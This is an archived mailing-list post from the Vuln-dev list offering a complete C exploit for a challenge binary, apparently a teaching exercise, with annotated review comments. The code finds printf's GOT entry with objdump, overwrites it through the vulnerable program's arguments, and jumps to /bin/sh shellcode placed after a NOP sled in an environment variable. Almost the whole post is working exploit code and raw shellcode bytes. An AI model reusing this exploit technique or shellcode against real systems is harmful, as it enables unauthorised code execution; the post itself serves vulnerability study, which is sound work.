Vulnerability Development mailing list archives

[Vuln-dev Challenge] example exploit for 2


From: <ot () hushmail com>
Date: Sat, 24 May 2003 09:18:47 -0700



Example exploit for vuln-dev challenge 2; it requires the address of the
shellcode in the environment as its only command-line argument.

/*
 * example exploit code for vuln-dev challenge 2
 *
 * we overwrite printf's got table entry to point to our
 * shellcode in the environment
 *
 * omicron tau - ot () hushmail com
 */

/*
 * objdump, grep, and awk need to be in your path
 *
 * tested on linux 2.4.20 using env address 0xbfffe2ac
 *
 * rm db.log first
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VULNPATH        "./vdc2"                /* path to vulnerable binary; also spliced into a shell command, so keep it a literal */

/* /bin/sh */
char shellcode[]=
    "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
    "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
    "\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62"
    "\x63\x64\x65";

unsigned int go;        /* GOT entry address for printf, filled in by find_got_addr(); 32-bit addresses only */

/*
 * Look up the relocation slot for printf in VULNPATH and store it in the
 * global `go`.
 *
 * Runs `objdump -R` on the binary through a shell pipeline and parses the
 * first line of its output as a hex address.  No arguments, no return
 * value; side effects are writing `go` and printing the chosen address.
 *
 * Review notes:
 *  - popen() and fgets() results are unchecked.  If popen() fails, fgets()
 *    is handed a NULL stream; if the pipeline prints nothing, `buf` still
 *    holds the command text and strtoul() parses that instead.
 *  - `go` is an unsigned int, so this only fits a 32-bit address space
 *    (the post says it was tested on Linux 2.4.20).
 *  - VULNPATH is interpolated into the command unquoted; that is only safe
 *    because it is a compile-time literal rather than user input.
 */
void
find_got_addr()
{
        FILE *p;
        char buf[1024];

        /* Pipeline: dynamic relocations -> the ' printf' line -> "0x<addr>".
         * The literal is re-joined here; the archive wrapped it mid-string. */
        snprintf(buf, sizeof(buf), "objdump -R %s | grep ' printf' | " \
            "awk '{ print \"0x\"$1 }'", VULNPATH);
        p = popen(buf, "r");
        fgets(buf, sizeof(buf), p);     /* first output line, reusing buf */
        pclose(p);

        go = strtoul(buf, NULL, 0);     /* base 0 honours the "0x" prefix */
        go -= 2;        /* -2 adjustment; the author's original comment (";;") does not explain it */

        printf("[!] using got addr 0x%x\n", go);
}

/*
 * Entry point.  Usage: vdc2x <scaddr>
 *
 * argv[1] is parsed with strtoul() (any base, e.g. "0xbfffe2ac") and is the
 * address the user expects the SC environment variable to occupy in the
 * target process.  Builds two arguments and the SC variable as described
 * inline, then execl()s VULNPATH.
 *
 * Exits with status 1 on bad usage.  Returns 0 only if execl() fails, since
 * a successful exec never returns; that failure is not reported.
 */
int
main(int argc, char *argv[])
{
        char envbuf[8192];      /* value handed to setenv("SC", ...) */
        char obuf[129];         /* target argv[1]: 32 copies of `go` + NUL */
        char scbuf[5];          /* target argv[2]: 4 raw bytes of scaddr + NUL */
        unsigned int scaddr;
        int i;

        if (argc < 2) {
                fputs("vdc2x: usage: vdc2x scaddr\n", stderr);
                exit(1);
        }
        scaddr = strtoul(argv[1], NULL, 0);     /* argv[1] is not validated */

        find_got_addr();        /* fills the global `go` */

        /* obuf: the 4-byte `go` value repeated across 128 bytes, then NUL.
         * `i` is int and sizeof() yields size_t, so the loop condition
         * mixes signed and unsigned (harmless here; -Wsign-compare warns). */
        memset(obuf, 0, sizeof(obuf));
        for (i = 0; i < sizeof(obuf) - 1; i+=4)
                memcpy(&obuf[i], &go, 4);
        obuf[sizeof(obuf) - 1] = 0;

        /* envbuf: 0x90 (x86 nop) filler with the shellcode copied to offset
         * 8000.  strlen() stops at the first NUL, so this relies on the
         * shellcode containing none; the 63 bytes on the page end at 8063,
         * well before the terminating NUL written at index 8191. */
        memset(envbuf, 0x90, sizeof(envbuf));
        memcpy(&envbuf[8000], shellcode, strlen(shellcode));
        envbuf[sizeof(envbuf) - 1] = 0;
        setenv("SC", envbuf, 1);        /* overwrite any existing SC */

        /* scbuf: scaddr in host byte order as a C string.  exec passes
         * NUL-terminated strings, so a zero byte inside scaddr truncates
         * the argument. */
        memcpy(scbuf, &scaddr, 4);
        scbuf[4] = 0;
        execl(VULNPATH, "./vdc2", obuf, scbuf, NULL);

        return(0);      /* reached only if execl() failed; errno is not reported */
}





